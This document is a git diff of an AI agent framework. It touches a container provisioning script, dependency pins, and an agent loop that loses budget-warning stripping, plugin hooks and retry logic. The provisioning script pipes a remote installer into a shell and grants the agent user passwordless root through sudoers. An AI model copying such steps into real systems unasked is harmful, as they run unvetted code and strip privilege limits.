apt-get install -y -qq sudo nodejs npm curl
|
||||
touch /var/lib/hermes-tools-provisioned
|
||||
# Install sudo on Debian/Ubuntu if missing (first boot only, cached in writable layer)
|
||||
if command -v apt-get >/dev/null 2>&1 && ! command -v sudo >/dev/null 2>&1; then
|
||||
apt-get update -qq >/dev/null 2>&1 && apt-get install -y -qq sudo >/dev/null 2>&1 || true
|
||||
fi
|
||||
|
||||
if command -v sudo >/dev/null 2>&1 && [ ! -f /etc/sudoers.d/hermes ]; then
|
||||
mkdir -p /etc/sudoers.d
|
||||
echo "$TARGET_USER ALL=(ALL) NOPASSWD:ALL" > /etc/sudoers.d/hermes
|
||||
chmod 0440 /etc/sudoers.d/hermes
|
||||
fi
|
||||
|
||||
# uv (Python manager) — not in Ubuntu repos, retry-safe outside the sentinel
|
||||
if ! command -v uv >/dev/null 2>&1 && [ ! -x "$TARGET_HOME/.local/bin/uv" ] && command -v curl >/dev/null 2>&1; then
|
||||
su -s /bin/sh "$TARGET_USER" -c 'curl -LsSf https://astral.sh/uv/install.sh | sh' || true
|
||||
fi
|
||||
|
||||
# Python 3.11 venv — gives the agent a writable Python with pip.
|
||||
# Uses uv to install Python 3.11 (Ubuntu 24.04 ships 3.12).
|
||||
# --seed includes pip/setuptools so bare `pip install` works.
|
||||
_UV_BIN="$TARGET_HOME/.local/bin/uv"
|
||||
if [ ! -d "$TARGET_HOME/.venv" ] && [ -x "$_UV_BIN" ]; then
|
||||
su -s /bin/sh "$TARGET_USER" -c "
|
||||
export PATH=\"\$HOME/.local/bin:\$PATH\"
|
||||
uv python install 3.11
|
||||
uv venv --python 3.11 --seed \"\$HOME/.venv\"
|
||||
" || true
|
||||
fi
|
||||
|
||||
# Put the agent venv first on PATH so python/pip resolve to writable copies
|
||||
if [ -d "$TARGET_HOME/.venv/bin" ]; then
|
||||
export PATH="$TARGET_HOME/.venv/bin:$PATH"
|
||||
fi
|
||||
|
||||
if command -v setpriv >/dev/null 2>&1; then
|
||||
exec setpriv --reuid="$HERMES_UID" --regid="$HERMES_GID" --init-groups "$@"
|
||||
elif command -v su >/dev/null 2>&1; then
|
||||
|
||||
+1
-1
@@ -35,7 +35,7 @@
|
||||
|
||||
${pkgs.lib.concatMapStringsSep "\n" (name: ''
|
||||
makeWrapper ${hermesVenv}/bin/${name} $out/bin/${name} \
|
||||
--suffix PATH : "${runtimePath}" \
|
||||
--prefix PATH : "${runtimePath}" \
|
||||
--set HERMES_BUNDLED_SKILLS $out/share/hermes-agent/skills
|
||||
'') [ "hermes" "hermes-agent" "hermes-acp" ]}
|
||||
|
||||
|
||||
+2
-2
@@ -37,7 +37,7 @@ dependencies = [
|
||||
]
|
||||
|
||||
[project.optional-dependencies]
|
||||
modal = ["modal>=1.0.0,<2"]
|
||||
modal = ["swe-rex[modal]>=1.4.0,<2"]
|
||||
daytona = ["daytona>=0.148.0,<1"]
|
||||
dev = ["pytest>=9.0.2,<10", "pytest-asyncio>=1.3.0,<2", "pytest-xdist>=3.0,<4", "mcp>=1.2.0,<2"]
|
||||
messaging = ["python-telegram-bot>=22.6,<23", "discord.py[voice]>=2.7.1,<3", "aiohttp>=3.13.3,<4", "slack-bolt>=1.18.0,<2", "slack-sdk>=3.27.0,<4"]
|
||||
@@ -55,7 +55,7 @@ honcho = ["honcho-ai>=2.0.1,<3"]
|
||||
mcp = ["mcp>=1.2.0,<2"]
|
||||
homeassistant = ["aiohttp>=3.9.0,<4"]
|
||||
sms = ["aiohttp>=3.9.0,<4"]
|
||||
acp = ["agent-client-protocol>=0.8.1,<0.9"]
|
||||
acp = ["agent-client-protocol>=0.8.1,<1.0"]
|
||||
dingtalk = ["dingtalk-stream>=0.1.0,<1"]
|
||||
rl = [
|
||||
"atroposlib @ git+https://github.com/NousResearch/atropos.git",
|
||||
|
||||
+30
-416
@@ -62,12 +62,7 @@ else:
|
||||
|
||||
|
||||
# Import our tool system
|
||||
from model_tools import (
|
||||
get_tool_definitions,
|
||||
get_toolset_for_tool,
|
||||
handle_function_call,
|
||||
check_toolset_requirements,
|
||||
)
|
||||
from model_tools import get_tool_definitions, handle_function_call, check_toolset_requirements
|
||||
from tools.terminal_tool import cleanup_vm
|
||||
from tools.interrupt import set_interrupt as _set_interrupt
|
||||
from tools.browser_tool import cleanup_browser
|
||||
@@ -88,7 +83,7 @@ from agent.model_metadata import (
|
||||
)
|
||||
from agent.context_compressor import ContextCompressor
|
||||
from agent.prompt_caching import apply_anthropic_cache_control
|
||||
from agent.prompt_builder import build_skills_system_prompt, build_context_files_prompt, load_soul_md, TOOL_USE_ENFORCEMENT_GUIDANCE, TOOL_USE_ENFORCEMENT_MODELS
|
||||
from agent.prompt_builder import build_skills_system_prompt, build_context_files_prompt, load_soul_md
|
||||
from agent.usage_pricing import estimate_usage_cost, normalize_usage
|
||||
from agent.display import (
|
||||
KawaiiSpinner, build_tool_preview as _build_tool_preview,
|
||||
@@ -361,43 +356,6 @@ def _inject_honcho_turn_context(content, turn_context: str):
|
||||
return f"{text}\n\n{note}"
|
||||
|
||||
|
||||
# Budget warning text patterns injected by _get_budget_warning().
|
||||
_BUDGET_WARNING_RE = re.compile(
|
||||
r"\[BUDGET(?:\s+WARNING)?:\s+Iteration\s+\d+/\d+\..*?\]",
|
||||
re.DOTALL,
|
||||
)
|
||||
|
||||
|
||||
def _strip_budget_warnings_from_history(messages: list) -> None:
|
||||
"""Remove budget pressure warnings from tool-result messages in-place.
|
||||
|
||||
Budget warnings are turn-scoped signals that must not leak into replayed
|
||||
history. They live in tool-result ``content`` either as a JSON key
|
||||
(``_budget_warning``) or appended plain text.
|
||||
"""
|
||||
for msg in messages:
|
||||
if not isinstance(msg, dict) or msg.get("role") != "tool":
|
||||
continue
|
||||
content = msg.get("content")
|
||||
if not isinstance(content, str) or "_budget_warning" not in content and "[BUDGET" not in content:
|
||||
continue
|
||||
|
||||
# Try JSON first (the common case: _budget_warning key in a dict)
|
||||
try:
|
||||
parsed = json.loads(content)
|
||||
if isinstance(parsed, dict) and "_budget_warning" in parsed:
|
||||
del parsed["_budget_warning"]
|
||||
msg["content"] = json.dumps(parsed, ensure_ascii=False)
|
||||
continue
|
||||
except (json.JSONDecodeError, TypeError):
|
||||
pass
|
||||
|
||||
# Fallback: strip the text pattern from plain-text tool results
|
||||
cleaned = _BUDGET_WARNING_RE.sub("", content).strip()
|
||||
if cleaned != content:
|
||||
msg["content"] = cleaned
|
||||
|
||||
|
||||
class AIAgent:
|
||||
"""
|
||||
AI Agent with tool calling capabilities.
|
||||
@@ -528,7 +486,6 @@ class AIAgent:
|
||||
# instead of going directly to stdout where patch_stdout's StdoutProxy
|
||||
# would mangle the escape sequences. None = use builtins.print.
|
||||
self._print_fn = None
|
||||
self.background_review_callback = None # Optional sync callback for gateway delivery
|
||||
self.skip_context_files = skip_context_files
|
||||
self.pass_session_id = pass_session_id
|
||||
self.log_prefix_chars = log_prefix_chars
|
||||
@@ -576,7 +533,6 @@ class AIAgent:
|
||||
self.tool_progress_callback = tool_progress_callback
|
||||
self.thinking_callback = thinking_callback
|
||||
self.reasoning_callback = reasoning_callback
|
||||
self._reasoning_deltas_fired = False # Set by _fire_reasoning_delta, reset per API call
|
||||
self.clarify_callback = clarify_callback
|
||||
self.step_callback = step_callback
|
||||
self.stream_delta_callback = stream_delta_callback
|
||||
@@ -819,25 +775,6 @@ class AIAgent:
|
||||
}
|
||||
|
||||
self._client_kwargs = client_kwargs # stored for rebuilding after interrupt
|
||||
|
||||
# Enable fine-grained tool streaming for Claude on OpenRouter.
|
||||
# Without this, Anthropic buffers the entire tool call and goes
|
||||
# silent for minutes while thinking — OpenRouter's upstream proxy
|
||||
# times out during the silence. The beta header makes Anthropic
|
||||
# stream tool call arguments token-by-token, keeping the
|
||||
# connection alive.
|
||||
_effective_base = str(client_kwargs.get("base_url", "")).lower()
|
||||
if "openrouter" in _effective_base and "claude" in (self.model or "").lower():
|
||||
headers = client_kwargs.get("default_headers") or {}
|
||||
existing_beta = headers.get("x-anthropic-beta", "")
|
||||
_FINE_GRAINED = "fine-grained-tool-streaming-2025-05-14"
|
||||
if _FINE_GRAINED not in existing_beta:
|
||||
if existing_beta:
|
||||
headers["x-anthropic-beta"] = f"{existing_beta},{_FINE_GRAINED}"
|
||||
else:
|
||||
headers["x-anthropic-beta"] = _FINE_GRAINED
|
||||
client_kwargs["default_headers"] = headers
|
||||
|
||||
self.api_key = client_kwargs.get("api_key", "")
|
||||
try:
|
||||
self.client = self._create_openai_client(client_kwargs, reason="agent_init", shared=True)
|
||||
@@ -1588,12 +1525,6 @@ class AIAgent:
|
||||
if actions:
|
||||
summary = " · ".join(dict.fromkeys(actions))
|
||||
self._safe_print(f" 💾 {summary}")
|
||||
_bg_cb = self.background_review_callback
|
||||
if _bg_cb:
|
||||
try:
|
||||
_bg_cb(f"💾 {summary}")
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
except Exception as e:
|
||||
logger.debug("Background memory/skill review failed: %s", e)
|
||||
@@ -2117,23 +2048,6 @@ class AIAgent:
|
||||
msg["content"] = self._clean_session_content(msg["content"])
|
||||
cleaned.append(msg)
|
||||
|
||||
# Guard: never overwrite a larger session log with fewer messages.
|
||||
# This protects against data loss when --resume loads a session whose
|
||||
# messages weren't fully written to SQLite — the resumed agent starts
|
||||
# with partial history and would otherwise clobber the full JSON log.
|
||||
if self.session_log_file.exists():
|
||||
try:
|
||||
existing = json.loads(self.session_log_file.read_text(encoding="utf-8"))
|
||||
existing_count = existing.get("message_count", len(existing.get("messages", [])))
|
||||
if existing_count > len(cleaned):
|
||||
logging.debug(
|
||||
"Skipping session log overwrite: existing has %d messages, current has %d",
|
||||
existing_count, len(cleaned),
|
||||
)
|
||||
return
|
||||
except Exception:
|
||||
pass # corrupted existing file — allow the overwrite
|
||||
|
||||
entry = {
|
||||
"session_id": self.session_id,
|
||||
"model": self.model,
|
||||
@@ -2510,16 +2424,6 @@ class AIAgent:
|
||||
if tool_guidance:
|
||||
prompt_parts.append(" ".join(tool_guidance))
|
||||
|
||||
# Some model families benefit from explicit tool-use enforcement.
|
||||
# Without this, they tend to describe intended actions as text
|
||||
# ("I will run the tests") instead of actually making tool calls.
|
||||
# TOOL_USE_ENFORCEMENT_MODELS is a tuple of substrings to match.
|
||||
# Inject only when the model has tools available.
|
||||
if self.valid_tool_names:
|
||||
model_lower = (self.model or "").lower()
|
||||
if any(p in model_lower for p in TOOL_USE_ENFORCEMENT_MODELS):
|
||||
prompt_parts.append(TOOL_USE_ENFORCEMENT_GUIDANCE)
|
||||
|
||||
# Honcho CLI awareness: tell Hermes about its own management commands
|
||||
# so it can refer the user to them rather than reinventing answers.
|
||||
if self._honcho and self._honcho_session_key:
|
||||
@@ -2592,13 +2496,7 @@ class AIAgent:
|
||||
|
||||
has_skills_tools = any(name in self.valid_tool_names for name in ['skills_list', 'skill_view', 'skill_manage'])
|
||||
if has_skills_tools:
|
||||
avail_toolsets = {
|
||||
toolset
|
||||
for toolset in (
|
||||
get_toolset_for_tool(tool_name) for tool_name in self.valid_tool_names
|
||||
)
|
||||
if toolset
|
||||
}
|
||||
avail_toolsets = {ts for ts, avail in check_toolset_requirements().items() if avail}
|
||||
skills_prompt = build_skills_system_prompt(
|
||||
available_tools=self.valid_tool_names,
|
||||
available_toolsets=avail_toolsets,
|
||||
@@ -3482,7 +3380,6 @@ class AIAgent:
|
||||
max_stream_retries = 1
|
||||
has_tool_calls = False
|
||||
first_delta_fired = False
|
||||
self._reasoning_deltas_fired = False
|
||||
for attempt in range(max_stream_retries + 1):
|
||||
try:
|
||||
with active_client.responses.stream(**api_kwargs) as stream:
|
||||
@@ -3759,7 +3656,6 @@ class AIAgent:
|
||||
|
||||
def _fire_reasoning_delta(self, text: str) -> None:
|
||||
"""Fire reasoning callback if registered."""
|
||||
self._reasoning_deltas_fired = True
|
||||
cb = self.reasoning_callback
|
||||
if cb is not None:
|
||||
try:
|
||||
@@ -3838,7 +3734,7 @@ class AIAgent:
|
||||
def _call_chat_completions():
|
||||
"""Stream a chat completions response."""
|
||||
import httpx as _httpx
|
||||
_base_timeout = float(os.getenv("HERMES_API_TIMEOUT", 1800.0))
|
||||
_base_timeout = float(os.getenv("HERMES_API_TIMEOUT", 900.0))
|
||||
_stream_read_timeout = float(os.getenv("HERMES_STREAM_READ_TIMEOUT", 60.0))
|
||||
stream_kwargs = {
|
||||
**api_kwargs,
|
||||
@@ -3854,9 +3750,6 @@ class AIAgent:
|
||||
request_client_holder["client"] = self._create_request_openai_client(
|
||||
reason="chat_completion_stream_request"
|
||||
)
|
||||
# Reset stale-stream timer so the detector measures from this
|
||||
# attempt's start, not a previous attempt's last chunk.
|
||||
last_chunk_time["t"] = time.time()
|
||||
stream = request_client_holder["client"].chat.completions.create(**stream_kwargs)
|
||||
|
||||
content_parts: list = []
|
||||
@@ -3867,9 +3760,6 @@ class AIAgent:
|
||||
role = "assistant"
|
||||
reasoning_parts: list = []
|
||||
usage_obj = None
|
||||
# Reset per-call reasoning tracking so _build_assistant_message
|
||||
# knows whether reasoning was already displayed during streaming.
|
||||
self._reasoning_deltas_fired = False
|
||||
|
||||
for chunk in stream:
|
||||
last_chunk_time["t"] = time.time()
|
||||
@@ -3989,10 +3879,7 @@ class AIAgent:
|
||||
works unchanged.
|
||||
"""
|
||||
has_tool_use = False
|
||||
self._reasoning_deltas_fired = False
|
||||
|
||||
# Reset stale-stream timer for this attempt
|
||||
last_chunk_time["t"] = time.time()
|
||||
# Use the Anthropic SDK's streaming context manager
|
||||
with self._anthropic_client.messages.stream(**api_kwargs) as stream:
|
||||
for event in stream:
|
||||
@@ -4060,37 +3947,7 @@ class AIAgent:
|
||||
e, (_httpx.ConnectError, _httpx.RemoteProtocolError, ConnectionError)
|
||||
)
|
||||
|
||||
# SSE error events from proxies (e.g. OpenRouter sends
|
||||
# {"error":{"message":"Network connection lost."}}) are
|
||||
# raised as APIError by the OpenAI SDK. These are
|
||||
# semantically identical to httpx connection drops —
|
||||
# the upstream stream died — and should be retried with
|
||||
# a fresh connection. Distinguish from HTTP errors:
|
||||
# APIError from SSE has no status_code, while
|
||||
# APIStatusError (4xx/5xx) always has one.
|
||||
_is_sse_conn_err = False
|
||||
if not _is_timeout and not _is_conn_err:
|
||||
from openai import APIError as _APIError
|
||||
if isinstance(e, _APIError) and not getattr(e, "status_code", None):
|
||||
_err_lower_sse = str(e).lower()
|
||||
_SSE_CONN_PHRASES = (
|
||||
"connection lost",
|
||||
"connection reset",
|
||||
"connection closed",
|
||||
"connection terminated",
|
||||
"network error",
|
||||
"network connection",
|
||||
"terminated",
|
||||
"peer closed",
|
||||
"broken pipe",
|
||||
"upstream connect error",
|
||||
)
|
||||
_is_sse_conn_err = any(
|
||||
phrase in _err_lower_sse
|
||||
for phrase in _SSE_CONN_PHRASES
|
||||
)
|
||||
|
||||
if _is_timeout or _is_conn_err or _is_sse_conn_err:
|
||||
if _is_timeout or _is_conn_err:
|
||||
# Transient network / timeout error. Retry the
|
||||
# streaming request with a fresh connection first.
|
||||
if _stream_attempt < _max_stream_retries:
|
||||
@@ -4135,10 +3992,6 @@ class AIAgent:
|
||||
)
|
||||
|
||||
try:
|
||||
# Reset stale timer — the non-streaming fallback
|
||||
# uses its own client; prevent the stale detector
|
||||
# from firing on stale timestamps from failed streams.
|
||||
last_chunk_time["t"] = time.time()
|
||||
result["response"] = self._interruptible_api_call(api_kwargs)
|
||||
except Exception as fallback_err:
|
||||
result["error"] = fallback_err
|
||||
@@ -4148,19 +4001,7 @@ class AIAgent:
|
||||
if request_client is not None:
|
||||
self._close_request_openai_client(request_client, reason="stream_request_complete")
|
||||
|
||||
_stream_stale_timeout_base = float(os.getenv("HERMES_STREAM_STALE_TIMEOUT", 180.0))
|
||||
# Scale the stale timeout for large contexts: slow models (like Opus)
|
||||
# can legitimately think for minutes before producing the first token
|
||||
# when the context is large. Without this, the stale detector kills
|
||||
# healthy connections during the model's thinking phase, producing
|
||||
# spurious RemoteProtocolError ("peer closed connection").
|
||||
_est_tokens = sum(len(str(v)) for v in api_kwargs.get("messages", [])) // 4
|
||||
if _est_tokens > 100_000:
|
||||
_stream_stale_timeout = max(_stream_stale_timeout_base, 300.0)
|
||||
elif _est_tokens > 50_000:
|
||||
_stream_stale_timeout = max(_stream_stale_timeout_base, 240.0)
|
||||
else:
|
||||
_stream_stale_timeout = _stream_stale_timeout_base
|
||||
_stream_stale_timeout = float(os.getenv("HERMES_STREAM_STALE_TIMEOUT", 90.0))
|
||||
|
||||
t = threading.Thread(target=_call, daemon=True)
|
||||
t.start()
|
||||
@@ -4286,25 +4127,6 @@ class AIAgent:
|
||||
or is_native_anthropic
|
||||
)
|
||||
|
||||
# Update context compressor limits for the fallback model.
|
||||
# Without this, compression decisions use the primary model's
|
||||
# context window (e.g. 200K) instead of the fallback's (e.g. 32K),
|
||||
# causing oversized sessions to overflow the fallback.
|
||||
if hasattr(self, 'context_compressor') and self.context_compressor:
|
||||
from agent.model_metadata import get_model_context_length
|
||||
fb_context_length = get_model_context_length(
|
||||
self.model, base_url=self.base_url,
|
||||
api_key=self.api_key, provider=self.provider,
|
||||
)
|
||||
self.context_compressor.model = self.model
|
||||
self.context_compressor.base_url = self.base_url
|
||||
self.context_compressor.api_key = self.api_key
|
||||
self.context_compressor.provider = self.provider
|
||||
self.context_compressor.context_length = fb_context_length
|
||||
self.context_compressor.threshold_tokens = int(
|
||||
fb_context_length * self.context_compressor.threshold_percent
|
||||
)
|
||||
|
||||
self._emit_status(
|
||||
f"🔄 Primary model failed — switching to fallback: "
|
||||
f"{fb_model} via {fb_provider}"
|
||||
@@ -4474,10 +4296,6 @@ class AIAgent:
|
||||
if self.api_mode == "anthropic_messages":
|
||||
from agent.anthropic_adapter import build_anthropic_kwargs
|
||||
anthropic_messages = self._prepare_anthropic_messages_for_api(api_messages)
|
||||
# Pass context_length so the adapter can clamp max_tokens if the
|
||||
# user configured a smaller context window than the model's output limit.
|
||||
ctx_len = getattr(self, "context_compressor", None)
|
||||
ctx_len = ctx_len.context_length if ctx_len else None
|
||||
return build_anthropic_kwargs(
|
||||
model=self.model,
|
||||
messages=anthropic_messages,
|
||||
@@ -4486,7 +4304,6 @@ class AIAgent:
|
||||
reasoning_config=self.reasoning_config,
|
||||
is_oauth=self._is_anthropic_oauth,
|
||||
preserve_dots=self._anthropic_preserve_dots(),
|
||||
context_length=ctx_len,
|
||||
)
|
||||
|
||||
if self.api_mode == "codex_responses":
|
||||
@@ -4598,25 +4415,11 @@ class AIAgent:
|
||||
"model": self.model,
|
||||
"messages": sanitized_messages,
|
||||
"tools": self.tools if self.tools else None,
|
||||
"timeout": float(os.getenv("HERMES_API_TIMEOUT", 1800.0)),
|
||||
"timeout": float(os.getenv("HERMES_API_TIMEOUT", 900.0)),
|
||||
}
|
||||
|
||||
if self.max_tokens is not None:
|
||||
api_kwargs.update(self._max_tokens_param(self.max_tokens))
|
||||
elif self._is_openrouter_url() and "claude" in (self.model or "").lower():
|
||||
# OpenRouter translates requests to Anthropic's Messages API,
|
||||
# which requires max_tokens as a mandatory field. When we omit
|
||||
# it, OpenRouter picks a default that can be too low — the model
|
||||
# spends its output budget on thinking and has almost nothing
|
||||
# left for the actual response (especially large tool calls like
|
||||
# write_file). Sending the model's real output limit ensures
|
||||
# full capacity. Other providers handle the default fine.
|
||||
try:
|
||||
from agent.anthropic_adapter import _get_anthropic_max_output
|
||||
_model_output_limit = _get_anthropic_max_output(self.model)
|
||||
api_kwargs["max_tokens"] = _model_output_limit
|
||||
except Exception:
|
||||
pass # fail open — let OpenRouter pick its default
|
||||
|
||||
extra_body = {}
|
||||
|
||||
@@ -4752,15 +4555,11 @@ class AIAgent:
|
||||
logging.debug(f"Captured reasoning ({len(reasoning_text)} chars): {reasoning_text}")
|
||||
|
||||
if reasoning_text and self.reasoning_callback:
|
||||
# Skip callback when streaming is active — reasoning was already
|
||||
# displayed during the stream via one of two paths:
|
||||
# (a) _fire_reasoning_delta (structured reasoning_content deltas)
|
||||
# (b) _stream_delta tag extraction (<think>/<REASONING_SCRATCHPAD>)
|
||||
# When streaming is NOT active, always fire so non-streaming modes
|
||||
# (gateway, batch, quiet) still get reasoning.
|
||||
# Any reasoning that wasn't shown during streaming is caught by the
|
||||
# CLI post-response display fallback (cli.py _reasoning_shown_this_turn).
|
||||
if not self.stream_delta_callback:
|
||||
# Skip callback for <think>-extracted reasoning when streaming is active.
|
||||
# _stream_delta() already displayed <think> blocks during streaming;
|
||||
# firing the callback again would cause duplicate display.
|
||||
# Structured reasoning (from reasoning_content field) always fires.
|
||||
if _from_structured or not self.stream_delta_callback:
|
||||
try:
|
||||
self.reasoning_callback(reasoning_text)
|
||||
except Exception:
|
||||
@@ -5281,7 +5080,7 @@ class AIAgent:
|
||||
spinner = None
|
||||
if self.quiet_mode and not self.tool_progress_callback:
|
||||
face = random.choice(KawaiiSpinner.KAWAII_WAITING)
|
||||
spinner = KawaiiSpinner(f"{face} ⚡ running {num_tools} tools concurrently", spinner_type='dots', print_fn=self._print_fn)
|
||||
spinner = KawaiiSpinner(f"{face} ⚡ running {num_tools} tools concurrently", spinner_type='dots')
|
||||
spinner.start()
|
||||
|
||||
try:
|
||||
@@ -5322,7 +5121,7 @@ class AIAgent:
|
||||
# Print cute message per tool
|
||||
if self.quiet_mode:
|
||||
cute_msg = _get_cute_tool_message_impl(name, args, tool_duration, result=function_result)
|
||||
self._safe_print(f" {cute_msg}")
|
||||
print(f" {cute_msg}")
|
||||
elif not self.quiet_mode:
|
||||
if self.verbose_logging:
|
||||
print(f" ✅ Tool {i+1} completed in {tool_duration:.2f}s")
|
||||
@@ -5507,7 +5306,7 @@ class AIAgent:
|
||||
spinner = None
|
||||
if self.quiet_mode and not self.tool_progress_callback:
|
||||
face = random.choice(KawaiiSpinner.KAWAII_WAITING)
|
||||
spinner = KawaiiSpinner(f"{face} {spinner_label}", spinner_type='dots', print_fn=self._print_fn)
|
||||
spinner = KawaiiSpinner(f"{face} {spinner_label}", spinner_type='dots')
|
||||
spinner.start()
|
||||
self._delegate_spinner = spinner
|
||||
_delegate_result = None
|
||||
@@ -5537,7 +5336,7 @@ class AIAgent:
|
||||
preview = _build_tool_preview(function_name, function_args) or function_name
|
||||
if len(preview) > 30:
|
||||
preview = preview[:27] + "..."
|
||||
spinner = KawaiiSpinner(f"{face} {emoji} {preview}", spinner_type='dots', print_fn=self._print_fn)
|
||||
spinner = KawaiiSpinner(f"{face} {emoji} {preview}", spinner_type='dots')
|
||||
spinner.start()
|
||||
_spinner_result = None
|
||||
try:
|
||||
@@ -5921,14 +5720,6 @@ class AIAgent:
|
||||
|
||||
# Initialize conversation (copy to avoid mutating the caller's list)
|
||||
messages = list(conversation_history) if conversation_history else []
|
||||
|
||||
# Strip budget pressure warnings from previous turns. These are
|
||||
# turn-scoped signals injected by _get_budget_warning() into tool
|
||||
# result content. If left in the replayed history, models (especially
|
||||
# GPT-family) interpret them as still-active instructions and avoid
|
||||
# making tool calls in ALL subsequent turns.
|
||||
if messages:
|
||||
_strip_budget_warnings_from_history(messages)
|
||||
|
||||
# Hydrate todo store from conversation history (gateway creates a fresh
|
||||
# AIAgent per message, so the in-memory store is empty -- we need to
|
||||
@@ -6024,22 +5815,6 @@ class AIAgent:
|
||||
self._cached_system_prompt = (
|
||||
self._cached_system_prompt + "\n\n" + self._honcho_context
|
||||
).strip()
|
||||
|
||||
# Plugin hook: on_session_start
|
||||
# Fired once when a brand-new session is created (not on
|
||||
# continuation). Plugins can use this to initialise
|
||||
# session-scoped state (e.g. warm a memory cache).
|
||||
try:
|
||||
from hermes_cli.plugins import invoke_hook as _invoke_hook
|
||||
_invoke_hook(
|
||||
"on_session_start",
|
||||
session_id=self.session_id,
|
||||
model=self.model,
|
||||
platform=getattr(self, "platform", None) or "",
|
||||
)
|
||||
except Exception as exc:
|
||||
logger.warning("on_session_start hook failed: %s", exc)
|
||||
|
||||
# Store the system prompt snapshot in SQLite
|
||||
if self._session_db:
|
||||
try:
|
||||
@@ -6101,34 +5876,6 @@ class AIAgent:
|
||||
if _preflight_tokens < self.context_compressor.threshold_tokens:
|
||||
break # Under threshold
|
||||
|
||||
# Plugin hook: pre_llm_call
|
||||
# Fired once per turn before the tool-calling loop. Plugins can
|
||||
# return a dict with a ``context`` key whose value is a string
|
||||
# that will be appended to the ephemeral system prompt for every
|
||||
# API call in this turn (not persisted to session DB or cache).
|
||||
_plugin_turn_context = ""
|
||||
try:
|
||||
from hermes_cli.plugins import invoke_hook as _invoke_hook
|
||||
_pre_results = _invoke_hook(
|
||||
"pre_llm_call",
|
||||
session_id=self.session_id,
|
||||
user_message=original_user_message,
|
||||
conversation_history=list(messages),
|
||||
is_first_turn=(not bool(conversation_history)),
|
||||
model=self.model,
|
||||
platform=getattr(self, "platform", None) or "",
|
||||
)
|
||||
_ctx_parts = []
|
||||
for r in _pre_results:
|
||||
if isinstance(r, dict) and r.get("context"):
|
||||
_ctx_parts.append(str(r["context"]))
|
||||
elif isinstance(r, str) and r.strip():
|
||||
_ctx_parts.append(r)
|
||||
if _ctx_parts:
|
||||
_plugin_turn_context = "\n\n".join(_ctx_parts)
|
||||
except Exception as exc:
|
||||
logger.warning("pre_llm_call hook failed: %s", exc)
|
||||
|
||||
# Main conversation loop
|
||||
api_call_count = 0
|
||||
final_response = None
|
||||
@@ -6226,9 +5973,6 @@ class AIAgent:
|
||||
effective_system = active_system_prompt or ""
|
||||
if self.ephemeral_system_prompt:
|
||||
effective_system = (effective_system + "\n\n" + self.ephemeral_system_prompt).strip()
|
||||
# Plugin context from pre_llm_call hooks — ephemeral, not cached.
|
||||
if _plugin_turn_context:
|
||||
effective_system = (effective_system + "\n\n" + _plugin_turn_context).strip()
|
||||
if effective_system:
|
||||
api_messages = [{"role": "system", "content": effective_system}] + api_messages
|
||||
|
||||
@@ -6275,7 +6019,7 @@ class AIAgent:
|
||||
# Raw KawaiiSpinner only when no streaming consumers
|
||||
# (would conflict with streamed token output)
|
||||
spinner_type = random.choice(['brain', 'sparkle', 'pulse', 'moon', 'star'])
|
||||
thinking_spinner = KawaiiSpinner(f"{face} {verb}...", spinner_type=spinner_type, print_fn=self._print_fn)
|
||||
thinking_spinner = KawaiiSpinner(f"{face} {verb}...", spinner_type=spinner_type)
|
||||
thinking_spinner.start()
|
||||
|
||||
# Log request details if verbose
|
||||
@@ -6505,62 +6249,6 @@ class AIAgent:
|
||||
if finish_reason == "length":
|
||||
self._vprint(f"{self.log_prefix}⚠️ Response truncated (finish_reason='length') - model hit max output tokens", force=True)
|
||||
|
||||
# ── Detect thinking-budget exhaustion ──────────────
|
||||
# When the model spends ALL output tokens on reasoning
|
||||
# and has none left for the response, continuation
|
||||
# retries are pointless. Detect this early and give a
|
||||
# targeted error instead of wasting 3 API calls.
|
||||
_trunc_content = None
|
||||
if self.api_mode == "chat_completions":
|
||||
_trunc_msg = response.choices[0].message if (hasattr(response, "choices") and response.choices) else None
|
||||
_trunc_content = getattr(_trunc_msg, "content", None) if _trunc_msg else None
|
||||
elif self.api_mode == "anthropic_messages":
|
||||
# Anthropic response.content is a list of blocks
|
||||
_text_parts = []
|
||||
for _blk in getattr(response, "content", []):
|
||||
if getattr(_blk, "type", None) == "text":
|
||||
_text_parts.append(getattr(_blk, "text", ""))
|
||||
_trunc_content = "\n".join(_text_parts) if _text_parts else None
|
||||
|
||||
_thinking_exhausted = (
|
||||
_trunc_content is not None
|
||||
and not self._has_content_after_think_block(_trunc_content)
|
||||
) or _trunc_content is None
|
||||
|
||||
if _thinking_exhausted:
|
||||
_exhaust_error = (
|
||||
"Model used all output tokens on reasoning with none left "
|
||||
"for the response. Try lowering reasoning effort or "
|
||||
"increasing max_tokens."
|
||||
)
|
||||
self._vprint(
|
||||
f"{self.log_prefix}💭 Reasoning exhausted the output token budget — "
|
||||
f"no visible response was produced.",
|
||||
force=True,
|
||||
)
|
||||
# Return a user-friendly message as the response so
|
||||
# CLI (response box) and gateway (chat message) both
|
||||
# display it naturally instead of a suppressed error.
|
||||
_exhaust_response = (
|
||||
"⚠️ **Thinking Budget Exhausted**\n\n"
|
||||
"The model used all its output tokens on reasoning "
|
||||
"and had none left for the actual response.\n\n"
|
||||
"To fix this:\n"
|
||||
"→ Lower reasoning effort: `/thinkon low` or `/thinkon minimal`\n"
|
||||
"→ Increase the output token limit: "
|
||||
"set `model.max_tokens` in config.yaml"
|
||||
)
|
||||
self._cleanup_task_resources(effective_task_id)
|
||||
self._persist_session(messages, conversation_history)
|
||||
return {
|
||||
"final_response": _exhaust_response,
|
||||
"messages": messages,
|
||||
"api_calls": api_call_count,
|
||||
"completed": False,
|
||||
"partial": True,
|
||||
"error": _exhaust_error,
|
||||
}
|
||||
|
||||
if self.api_mode == "chat_completions":
|
||||
assistant_message = response.choices[0].message
|
||||
if not assistant_message.tool_calls:
|
||||
@@ -7088,36 +6776,6 @@ class AIAgent:
|
||||
_final_summary = self._summarize_api_error(api_error)
|
||||
self._vprint(f"{self.log_prefix}❌ Max retries ({max_retries}) exceeded. Giving up.", force=True)
|
||||
self._vprint(f"{self.log_prefix} 💀 Final error: {_final_summary}", force=True)
|
||||
|
||||
# Detect SSE stream-drop pattern (e.g. "Network
|
||||
# connection lost") and surface actionable guidance.
|
||||
# This typically happens when the model generates a
|
||||
# very large tool call (write_file with huge content)
|
||||
# and the proxy/CDN drops the stream mid-response.
|
||||
_is_stream_drop = (
|
||||
not getattr(api_error, "status_code", None)
|
||||
and any(p in error_msg for p in (
|
||||
"connection lost", "connection reset",
|
||||
"connection closed", "network connection",
|
||||
"network error", "terminated",
|
||||
))
|
||||
)
|
||||
if _is_stream_drop:
|
||||
